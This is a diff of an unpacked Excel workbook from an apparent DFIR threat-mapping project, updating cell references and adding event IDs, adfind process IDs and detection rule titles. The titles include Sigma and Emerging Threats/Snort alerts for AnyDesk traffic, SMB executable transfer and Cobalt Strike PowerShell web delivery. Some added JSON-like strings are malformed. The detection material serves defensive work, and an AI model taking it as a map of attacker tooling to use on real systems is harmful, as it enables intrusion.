       <c r="E105" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F105" s="1" t="s">
-        <v>205</v>
-      </c>
-      <c r="G105" s="1"/>
-    </row>
-    <row r="106" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+        <v>198</v>
+      </c>
+      <c r="F105" s="1"/>
+      <c r="G105" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="106" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A106" s="1" t="s">
-        <v>222</v>
+        <v>215</v>
       </c>
       <c r="B106" s="1"/>
       <c r="C106" s="1"/>
       <c r="D106" s="1" t="s">
-        <v>225</v>
+        <v>223</v>
       </c>
       <c r="E106" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F106" s="1" t="s">
-        <v>206</v>
-      </c>
-      <c r="G106" s="1"/>
+        <v>199</v>
+      </c>
+      <c r="F106" s="1"/>
+      <c r="G106" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
     <row r="107" spans="1:7" ht="119" x14ac:dyDescent="0.2">
       <c r="A107" s="1"/>
       <c r="B107" s="1"/>
       <c r="C107" s="1"/>
       <c r="D107" s="1" t="s">
-        <v>224</v>
-      </c>
-      <c r="E107" s="1"/>
-      <c r="F107" s="1" t="s">
-        <v>223</v>
-      </c>
+        <v>217</v>
+      </c>
+      <c r="E107" s="1" t="s">
+        <v>216</v>
+      </c>
+      <c r="F107" s="1"/>
       <c r="G107" s="1"/>
     </row>
   </sheetData>

--- a/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
+++ b/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/dfir_osir/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{23942935-4E0C-4549-8E6A-038236704EDF}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{58851098-686E-0F48-912E-2F1D629745C3}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="760" windowWidth="34560" windowHeight="21580" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="459" uniqueCount="227">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="477" uniqueCount="239">
   <si>
     <t>eid</t>
   </si>
@@ -591,9 +591,6 @@
     <t>dfir20220808-eid0089</t>
   </si>
   <si>
-    <t>{"sigma_uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", "sigma_title": "ISO or Image Mount Indicator in Recent Files"}</t>
-  </si>
-  <si>
     <t>{"sigma_uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "sigma_title": "ISO Image Mount"}</t>
   </si>
   <si>
@@ -687,21 +684,6 @@
     <t>dfir20220808-eid0105</t>
   </si>
   <si>
-    <t>ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
-ET POLICY SMB Executable File Transfer
-ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
-ET POLICY SMB2 NT Create AndX Request For an Executable File
-ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)
-ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent
-(Snort VRT) MALWARE-OTHER CobaltStrike powershell web delivery attempt</t>
-  </si>
-  <si>
-    <t>generic</t>
-  </si>
-  <si>
-    <t>et_rule</t>
-  </si>
-  <si>
     <t>eid_type</t>
   </si>
   <si>
@@ -711,9 +693,6 @@
     <t>ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent</t>
   </si>
   <si>
-    <t>ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software</t>
-  </si>
-  <si>
     <t>object_sigma</t>
   </si>
   <si>
@@ -724,6 +703,57 @@
   </si>
   <si>
     <t>ns_meta</t>
+  </si>
+  <si>
+    <t>["adfind-pid0001", adfind-pid0009"]</t>
+  </si>
+  <si>
+    <t>["adfind-pid0002", adfind-pid0009"]</t>
+  </si>
+  <si>
+    <t>["adfind-pid0007", adfind-pid0009"]</t>
+  </si>
+  <si>
+    <t>["adfind-pid0008", adfind-pid0009"]</t>
+  </si>
+  <si>
+    <t>ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)</t>
+  </si>
+  <si>
+    <t>ET POLICY SMB Executable File Transfer</t>
+  </si>
+  <si>
+    <t>ET RPC DCERPC SVCCTL - Remote Service Control Manager Access</t>
+  </si>
+  <si>
+    <t>ET POLICY SMB2 NT Create AndX Request For an Executable File</t>
+  </si>
+  <si>
+    <t>ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)</t>
+  </si>
+  <si>
+    <t>(Snort VRT) MALWARE-OTHER CobaltStrike powershell web delivery attempt</t>
+  </si>
+  <si>
+    <t>etpro</t>
+  </si>
+  <si>
+    <t>{"sigma_uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b" :  "ISO or Image Mount Indicator in Recent Files"}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0106</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0107</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0108</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0109</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0110</t>
   </si>
 </sst>
 </file>
@@ -813,8 +843,8 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G107" totalsRowShown="0" dataDxfId="7">
-  <autoFilter ref="A1:G107" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G111" totalsRowShown="0" dataDxfId="7">
+  <autoFilter ref="A1:G111" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
   <tableColumns count="7">
     <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
     <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="5"/>
@@ -1145,17 +1175,17 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
-  <dimension ref="A1:G107"/>
+  <dimension ref="A1:G111"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="E1" workbookViewId="0">
-      <selection activeCell="G4" sqref="G4"/>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="E13" sqref="E13"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
   <cols>
     <col min="1" max="1" width="21.1640625" customWidth="1"/>
     <col min="2" max="2" width="21.5" customWidth="1"/>
-    <col min="3" max="3" width="14.33203125" bestFit="1" customWidth="1"/>
+    <col min="3" max="3" width="17" customWidth="1"/>
     <col min="4" max="4" width="13.6640625" bestFit="1" customWidth="1"/>
     <col min="5" max="5" width="143.33203125" customWidth="1"/>
     <col min="6" max="6" width="82.6640625" customWidth="1"/>
@@ -1173,28 +1203,30 @@
         <v>10</v>
       </c>
       <c r="D1" t="s">
-        <v>219</v>
+        <v>215</v>
       </c>
       <c r="E1" t="s">
-        <v>225</v>
+        <v>220</v>
       </c>
       <c r="F1" t="s">
         <v>8</v>
       </c>
       <c r="G1" t="s">
-        <v>226</v>
+        <v>221</v>
       </c>
     </row>
     <row r="2" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A2" s="1" t="s">
         <v>3</v>
       </c>
-      <c r="B2" s="1"/>
+      <c r="B2" s="1" t="s">
+        <v>222</v>
+      </c>
       <c r="C2" s="1" t="s">
         <v>11</v>
       </c>
       <c r="D2" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E2" s="1" t="s">
         <v>35</v>
@@ -1208,12 +1240,14 @@
       <c r="A3" s="1" t="s">
         <v>12</v>
       </c>
-      <c r="B3" s="1"/>
+      <c r="B3" s="1" t="s">
+        <v>223</v>
+      </c>
       <c r="C3" s="1" t="s">
         <v>11</v>
       </c>
       <c r="D3" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E3" s="1" t="s">
         <v>40</v>
@@ -1227,12 +1261,14 @@
       <c r="A4" s="1" t="s">
         <v>13</v>
       </c>
-      <c r="B4" s="1"/>
+      <c r="B4" s="1" t="s">
+        <v>224</v>
+      </c>
       <c r="C4" s="1" t="s">
         <v>11</v>
       </c>
       <c r="D4" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E4" s="1" t="s">
         <v>36</v>
@@ -1246,12 +1282,14 @@
       <c r="A5" s="1" t="s">
         <v>14</v>
       </c>
-      <c r="B5" s="1"/>
+      <c r="B5" s="1" t="s">
+        <v>225</v>
+      </c>
       <c r="C5" s="1" t="s">
         <v>11</v>
       </c>
       <c r="D5" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E5" s="1" t="s">
         <v>37</v>
@@ -1265,12 +1303,14 @@
       <c r="A6" s="1" t="s">
         <v>15</v>
       </c>
-      <c r="B6" s="1"/>
+      <c r="B6" s="1" t="s">
+        <v>224</v>
+      </c>
       <c r="C6" s="1" t="s">
         <v>11</v>
       </c>
       <c r="D6" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E6" s="1" t="s">
         <v>38</v>
@@ -1284,12 +1324,14 @@
       <c r="A7" s="1" t="s">
         <v>16</v>
       </c>
-      <c r="B7" s="1"/>
+      <c r="B7" s="1" t="s">
+        <v>225</v>
+      </c>
       <c r="C7" s="1" t="s">
         <v>11</v>
       </c>
       <c r="D7" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E7" s="1" t="s">
         <v>39</v>
@@ -1303,12 +1345,14 @@
       <c r="A8" s="1" t="s">
         <v>17</v>
       </c>
-      <c r="B8" s="1"/>
+      <c r="B8" s="1" t="s">
+        <v>223</v>
+      </c>
       <c r="C8" s="1" t="s">
         <v>11</v>
       </c>
       <c r="D8" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E8" s="1" t="s">
         <v>34</v>
@@ -1327,7 +1371,7 @@
         <v>11</v>
       </c>
       <c r="D9" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E9" s="1" t="s">
         <v>4</v>
@@ -1346,7 +1390,7 @@
         <v>11</v>
       </c>
       <c r="D10" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E10" s="1" t="s">
         <v>5</v>
@@ -1365,7 +1409,7 @@
         <v>11</v>
       </c>
       <c r="D11" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E11" s="1" t="s">
         <v>6</v>
@@ -1384,7 +1428,7 @@
         <v>11</v>
       </c>
       <c r="D12" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E12" s="1" t="s">
         <v>7</v>
@@ -1403,7 +1447,7 @@
       <c r="B13" s="1"/>
       <c r="C13" s="1"/>
       <c r="D13" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E13" s="1" t="s">
         <v>22</v>
@@ -1420,7 +1464,7 @@
       <c r="B14" s="1"/>
       <c r="C14" s="1"/>
       <c r="D14" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E14" s="1" t="s">
         <v>23</v>
@@ -1437,7 +1481,7 @@
       <c r="B15" s="1"/>
       <c r="C15" s="1"/>
       <c r="D15" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E15" s="1" t="s">
         <v>26</v>
@@ -1454,7 +1498,7 @@
       <c r="B16" s="1"/>
       <c r="C16" s="1"/>
       <c r="D16" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E16" s="1" t="s">
         <v>27</v>
@@ -1471,7 +1515,7 @@
       <c r="B17" s="1"/>
       <c r="C17" s="1"/>
       <c r="D17" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E17" s="1" t="s">
         <v>28</v>
@@ -1488,7 +1532,7 @@
       <c r="B18" s="1"/>
       <c r="C18" s="1"/>
       <c r="D18" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E18" s="1" t="s">
         <v>29</v>
@@ -1505,7 +1549,7 @@
       <c r="B19" s="1"/>
       <c r="C19" s="1"/>
       <c r="D19" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E19" s="1" t="s">
         <v>30</v>
@@ -1522,7 +1566,7 @@
       <c r="B20" s="1"/>
       <c r="C20" s="1"/>
       <c r="D20" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E20" s="1" t="s">
         <v>31</v>
@@ -1539,7 +1583,7 @@
       <c r="B21" s="1"/>
       <c r="C21" s="1"/>
       <c r="D21" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E21" s="1" t="s">
         <v>32</v>
@@ -1556,7 +1600,7 @@
       <c r="B22" s="1"/>
       <c r="C22" s="1"/>
       <c r="D22" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E22" s="1" t="s">
         <v>33</v>
@@ -1573,7 +1617,7 @@
       <c r="B23" s="1"/>
       <c r="C23" s="1"/>
       <c r="D23" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E23" s="1" t="s">
         <v>41</v>
@@ -1590,7 +1634,7 @@
       <c r="B24" s="1"/>
       <c r="C24" s="1"/>
       <c r="D24" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E24" s="1" t="s">
         <v>42</v>
@@ -1607,7 +1651,7 @@
       <c r="B25" s="1"/>
       <c r="C25" s="1"/>
       <c r="D25" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E25" s="1" t="s">
         <v>43</v>
@@ -1624,7 +1668,7 @@
       <c r="B26" s="1"/>
       <c r="C26" s="1"/>
       <c r="D26" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E26" s="1" t="s">
         <v>44</v>
@@ -1641,7 +1685,7 @@
       <c r="B27" s="1"/>
       <c r="C27" s="1"/>
       <c r="D27" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E27" s="1" t="s">
         <v>57</v>
@@ -1658,7 +1702,7 @@
       <c r="B28" s="1"/>
       <c r="C28" s="1"/>
       <c r="D28" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E28" s="1" t="s">
         <v>60</v>
@@ -1675,7 +1719,7 @@
       <c r="B29" s="1"/>
       <c r="C29" s="1"/>
       <c r="D29" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E29" s="1" t="s">
         <v>59</v>
@@ -1692,7 +1736,7 @@
       <c r="B30" s="1"/>
       <c r="C30" s="1"/>
       <c r="D30" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E30" s="1" t="s">
         <v>58</v>
@@ -1709,7 +1753,7 @@
       <c r="B31" s="1"/>
       <c r="C31" s="1"/>
       <c r="D31" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E31" s="1" t="s">
         <v>61</v>
@@ -1726,7 +1770,7 @@
       <c r="B32" s="1"/>
       <c r="C32" s="1"/>
       <c r="D32" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E32" s="1" t="s">
         <v>62</v>
@@ -1743,7 +1787,7 @@
       <c r="B33" s="1"/>
       <c r="C33" s="1"/>
       <c r="D33" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E33" s="1" t="s">
         <v>69</v>
@@ -1760,7 +1804,7 @@
       <c r="B34" s="1"/>
       <c r="C34" s="1"/>
       <c r="D34" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E34" s="1" t="s">
         <v>70</v>
@@ -1777,7 +1821,7 @@
       <c r="B35" s="1"/>
       <c r="C35" s="1"/>
       <c r="D35" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E35" s="1" t="s">
         <v>71</v>
@@ -1794,7 +1838,7 @@
       <c r="B36" s="1"/>
       <c r="C36" s="1"/>
       <c r="D36" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E36" s="1" t="s">
         <v>72</v>
@@ -1811,7 +1855,7 @@
       <c r="B37" s="1"/>
       <c r="C37" s="1"/>
       <c r="D37" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E37" s="1" t="s">
         <v>73</v>
@@ -1828,7 +1872,7 @@
       <c r="B38" s="1"/>
       <c r="C38" s="1"/>
       <c r="D38" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E38" s="1" t="s">
         <v>74</v>
@@ -1845,7 +1889,7 @@
       <c r="B39" s="1"/>
       <c r="C39" s="1"/>
       <c r="D39" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E39" s="1" t="s">
         <v>75</v>
@@ -1862,7 +1906,7 @@
       <c r="B40" s="1"/>
       <c r="C40" s="1"/>
       <c r="D40" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E40" s="1" t="s">
         <v>76</v>
@@ -1879,7 +1923,7 @@
       <c r="B41" s="1"/>
       <c r="C41" s="1"/>
       <c r="D41" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E41" s="1" t="s">
         <v>85</v>
@@ -1896,7 +1940,7 @@
       <c r="B42" s="1"/>
       <c r="C42" s="1"/>
       <c r="D42" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E42" s="1" t="s">
         <v>86</v>
@@ -1913,7 +1957,7 @@
       <c r="B43" s="1"/>
       <c r="C43" s="1"/>
       <c r="D43" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E43" s="1" t="s">
         <v>87</v>
@@ -1930,7 +1974,7 @@
       <c r="B44" s="1"/>
       <c r="C44" s="1"/>
       <c r="D44" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E44" s="1" t="s">
         <v>88</v>
@@ -1947,7 +1991,7 @@
       <c r="B45" s="1"/>
       <c r="C45" s="1"/>
       <c r="D45" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E45" s="1" t="s">
         <v>89</v>
@@ -1964,7 +2008,7 @@
       <c r="B46" s="1"/>
       <c r="C46" s="1"/>
       <c r="D46" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E46" s="1" t="s">
         <v>90</v>
@@ -1981,7 +2025,7 @@
       <c r="B47" s="1"/>
       <c r="C47" s="1"/>
       <c r="D47" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E47" s="1" t="s">
         <v>91</v>
@@ -1998,7 +2042,7 @@
       <c r="B48" s="1"/>
       <c r="C48" s="1"/>
       <c r="D48" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E48" s="1" t="s">
         <v>92</v>
@@ -2015,7 +2059,7 @@
       <c r="B49" s="1"/>
       <c r="C49" s="1"/>
       <c r="D49" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E49" s="1" t="s">
         <v>101</v>
@@ -2032,7 +2076,7 @@
       <c r="B50" s="1"/>
       <c r="C50" s="1"/>
       <c r="D50" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E50" s="1" t="s">
         <v>102</v>
@@ -2049,7 +2093,7 @@
       <c r="B51" s="1"/>
       <c r="C51" s="1"/>
       <c r="D51" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E51" s="1" t="s">
         <v>103</v>
@@ -2066,7 +2110,7 @@
       <c r="B52" s="1"/>
       <c r="C52" s="1"/>
       <c r="D52" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E52" s="1" t="s">
         <v>107</v>
@@ -2083,7 +2127,7 @@
       <c r="B53" s="1"/>
       <c r="C53" s="1"/>
       <c r="D53" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E53" s="1" t="s">
         <v>112</v>
@@ -2100,7 +2144,7 @@
       <c r="B54" s="1"/>
       <c r="C54" s="1"/>
       <c r="D54" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E54" s="1" t="s">
         <v>110</v>
@@ -2117,7 +2161,7 @@
       <c r="B55" s="1"/>
       <c r="C55" s="1"/>
       <c r="D55" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E55" s="1" t="s">
         <v>111</v>
@@ -2134,7 +2178,7 @@
       <c r="B56" s="1"/>
       <c r="C56" s="1"/>
       <c r="D56" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E56" s="1" t="s">
         <v>113</v>
@@ -2151,7 +2195,7 @@
       <c r="B57" s="1"/>
       <c r="C57" s="1"/>
       <c r="D57" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E57" s="1" t="s">
         <v>114</v>
@@ -2168,7 +2212,7 @@
       <c r="B58" s="1"/>
       <c r="C58" s="1"/>
       <c r="D58" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E58" s="1" t="s">
         <v>115</v>
@@ -2185,7 +2229,7 @@
       <c r="B59" s="1"/>
       <c r="C59" s="1"/>
       <c r="D59" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E59" s="1" t="s">
         <v>116</v>
@@ -2202,7 +2246,7 @@
       <c r="B60" s="1"/>
       <c r="C60" s="1"/>
       <c r="D60" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E60" s="1" t="s">
         <v>117</v>
@@ -2219,7 +2263,7 @@
       <c r="B61" s="1"/>
       <c r="C61" s="1"/>
       <c r="D61" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E61" s="1" t="s">
         <v>118</v>
@@ -2236,7 +2280,7 @@
       <c r="B62" s="1"/>
       <c r="C62" s="1"/>
       <c r="D62" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E62" s="1" t="s">
         <v>119</v>
@@ -2253,7 +2297,7 @@
       <c r="B63" s="1"/>
       <c r="C63" s="1"/>
       <c r="D63" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E63" s="1" t="s">
         <v>120</v>
@@ -2270,7 +2314,7 @@
       <c r="B64" s="1"/>
       <c r="C64" s="1"/>
       <c r="D64" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E64" s="1" t="s">
         <v>122</v>
@@ -2287,7 +2331,7 @@
       <c r="B65" s="1"/>
       <c r="C65" s="1"/>
       <c r="D65" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E65" s="1" t="s">
         <v>121</v>
@@ -2304,7 +2348,7 @@
       <c r="B66" s="1"/>
       <c r="C66" s="1"/>
       <c r="D66" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E66" s="1" t="s">
         <v>135</v>
@@ -2321,10 +2365,10 @@
       <c r="B67" s="1"/>
       <c r="C67" s="1"/>
       <c r="D67" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E67" s="1" t="s">
-        <v>224</v>
+        <v>219</v>
       </c>
       <c r="F67" s="1" t="s">
         <v>137</v>
@@ -2340,7 +2384,7 @@
       <c r="B68" s="1"/>
       <c r="C68" s="1"/>
       <c r="D68" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E68" s="1" t="s">
         <v>140</v>
@@ -2359,7 +2403,7 @@
       <c r="B69" s="1"/>
       <c r="C69" s="1"/>
       <c r="D69" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E69" s="1" t="s">
         <v>141</v>
@@ -2378,7 +2422,7 @@
       <c r="B70" s="1"/>
       <c r="C70" s="1"/>
       <c r="D70" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E70" s="1" t="s">
         <v>142</v>
@@ -2397,7 +2441,7 @@
       <c r="B71" s="1"/>
       <c r="C71" s="1"/>
       <c r="D71" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E71" s="1" t="s">
         <v>143</v>
@@ -2416,7 +2460,7 @@
       <c r="B72" s="1"/>
       <c r="C72" s="1"/>
       <c r="D72" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E72" s="1" t="s">
         <v>144</v>
@@ -2435,7 +2479,7 @@
       <c r="B73" s="1"/>
       <c r="C73" s="1"/>
       <c r="D73" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E73" s="1" t="s">
         <v>150</v>
@@ -2454,7 +2498,7 @@
       <c r="B74" s="1"/>
       <c r="C74" s="1"/>
       <c r="D74" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E74" s="1" t="s">
         <v>151</v>
@@ -2473,7 +2517,7 @@
       <c r="B75" s="1"/>
       <c r="C75" s="1"/>
       <c r="D75" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E75" s="1" t="s">
         <v>152</v>
@@ -2492,7 +2536,7 @@
       <c r="B76" s="1"/>
       <c r="C76" s="1"/>
       <c r="D76" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E76" s="1" t="s">
         <v>153</v>
@@ -2511,7 +2555,7 @@
       <c r="B77" s="1"/>
       <c r="C77" s="1"/>
       <c r="D77" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E77" s="1" t="s">
         <v>154</v>
@@ -2530,7 +2574,7 @@
       <c r="B78" s="1"/>
       <c r="C78" s="1"/>
       <c r="D78" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E78" s="1" t="s">
         <v>155</v>
@@ -2549,7 +2593,7 @@
       <c r="B79" s="1"/>
       <c r="C79" s="1"/>
       <c r="D79" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E79" s="1" t="s">
         <v>156</v>
@@ -2568,7 +2612,7 @@
       <c r="B80" s="1"/>
       <c r="C80" s="1"/>
       <c r="D80" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E80" s="1" t="s">
         <v>157</v>
@@ -2587,7 +2631,7 @@
       <c r="B81" s="1"/>
       <c r="C81" s="1"/>
       <c r="D81" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E81" s="1" t="s">
         <v>158</v>
@@ -2606,7 +2650,7 @@
       <c r="B82" s="1"/>
       <c r="C82" s="1"/>
       <c r="D82" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E82" s="1" t="s">
         <v>159</v>
@@ -2625,7 +2669,7 @@
       <c r="B83" s="1"/>
       <c r="C83" s="1"/>
       <c r="D83" s="1" t="s">
-        <v>220</v>
+        <v>216</v>
       </c>
       <c r="E83" s="1" t="s">
         <v>160</v>
